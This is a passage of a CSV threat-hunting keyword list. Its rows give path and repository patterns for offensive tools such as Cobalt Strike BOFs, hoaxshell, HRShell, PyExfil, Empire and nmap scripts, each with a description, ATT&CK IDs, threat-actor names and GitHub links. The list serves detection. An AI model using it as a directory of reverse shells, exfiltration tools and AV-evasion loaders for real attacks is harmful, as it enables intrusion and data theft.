- T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/HiddenDesktop.git*",".{0,1000}\/HiddenDesktop\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*/hijack_opener/*.js*",".{0,1000}\/hijack_opener\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/hijack_opener/*.rb*",".{0,1000}\/hijack_opener\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/HijackDLL-CreateRemoteThread.cpp*",".{0,1000}\/HijackDLL\-CreateRemoteThread\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/HijackDll-Process.cpp*",".{0,1000}\/HijackDll\-Process\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/HijackDLL-Threads.*",".{0,1000}\/HijackDLL\-Threads\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/HijackHunter/*",".{0,1000}\/HijackHunter\/.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/HInvoke.cs*",".{0,1000}\/HInvoke\.cs.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*/hiphp.git*",".{0,1000}\/hiphp\.git.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*/hiphp-cli.sh*",".{0,1000}\/hiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*/hiphp-desktop.sh*",".{0,1000}\/hiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*/hiphp-main*",".{0,1000}\/hiphp\-main.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*/HiveDump.ps1*",".{0,1000}\/HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/hlldz*",".{0,1000}\/hlldz.{0,1000}","offensive_tool_keyword","Github Username","github username. 'My name is Halil Dalabasmaz. I consider myself Pwner.' containing exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/hlldz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hnap-info.nse*",".{0,1000}\/hnap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hoaxshell.git*",".{0,1000}\/hoaxshell\.git.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*/hoaxshell/*.py*",".{0,1000}\/hoaxshell\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*/holehe.git*",".{0,1000}\/holehe\.git.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*/hollow.x64.*",".{0,1000}\/hollow\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","257","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "*/home/app/wstunnel*",".{0,1000}\/home\/app\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/home/daddyShark/BabySh4rk/*",".{0,1000}\/home\/daddyShark\/BabySh4rk\/.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*/home/lowpriv/*",".{0,1000}\/home\/lowpriv\/.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/home/pyrdp/*",".{0,1000}\/home\/pyrdp\/.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/home/tor2web/*",".{0,1000}\/home\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/HookDetector.exe*",".{0,1000}\/HookDetector\.exe.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/hooks/spoof.c*",".{0,1000}\/hooks\/spoof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*/hop.php*",".{0,1000}\/hop\.php.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/horizon3ai/*",".{0,1000}\/horizon3ai\/.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*/HostEnum.ps1*",".{0,1000}\/HostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/hostenum.py*",".{0,1000}\/hostenum\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/hostmap-bfk.nse*",".{0,1000}\/hostmap\-bfk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hostmap-crtsh.nse*",".{0,1000}\/hostmap\-crtsh\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hostmap-robtex.nse*",".{0,1000}\/hostmap\-robtex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/HostRecon.ps1*",".{0,1000}\/HostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/HouQing/*/Loader.go",".{0,1000}\/HouQing\/.{0,1000}\/Loader\.go","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*/HRShell.git*",".{0,1000}\/HRShell\.git.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/HRShell/*",".{0,1000}\/HRShell\/.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/hta_attack/*",".{0,1000}\/hta_attack\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/HTMLSmuggler.git*",".{0,1000}\/HTMLSmuggler\.git.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*/HTMLSmuggler/*",".{0,1000}\/HTMLSmuggler\/.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*/htshells.git*",".{0,1000}\/htshells\.git.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*/http_exfiltration.py*",".{0,1000}\/http_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/http_payload.ps1*",".{0,1000}\/http_payload\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*/http-adobe-coldfusion-apsa1301.nse*",".{0,1000}\/http\-adobe\-coldfusion\-apsa1301\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-affiliate-id.nse*",".{0,1000}\/http\-affiliate\-id\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-apache-negotiation.nse*",".{0,1000}\/http\-apache\-negotiation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-apache-server-status.nse*",".{0,1000}\/http\-apache\-server\-status\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-aspnet-debug.nse*",".{0,1000}\/http\-aspnet\-debug\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/httpattack.py*",".{0,1000}\/httpattack\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*/http-auth.nse*",".{0,1000}\/http\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-auth-finder.nse*",".{0,1000}\/http\-auth\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-avaya-ipoffice-users.nse*",".{0,1000}\/http\-avaya\-ipoffice\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-awstatstotals-exec.nse*",".{0,1000}\/http\-awstatstotals\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 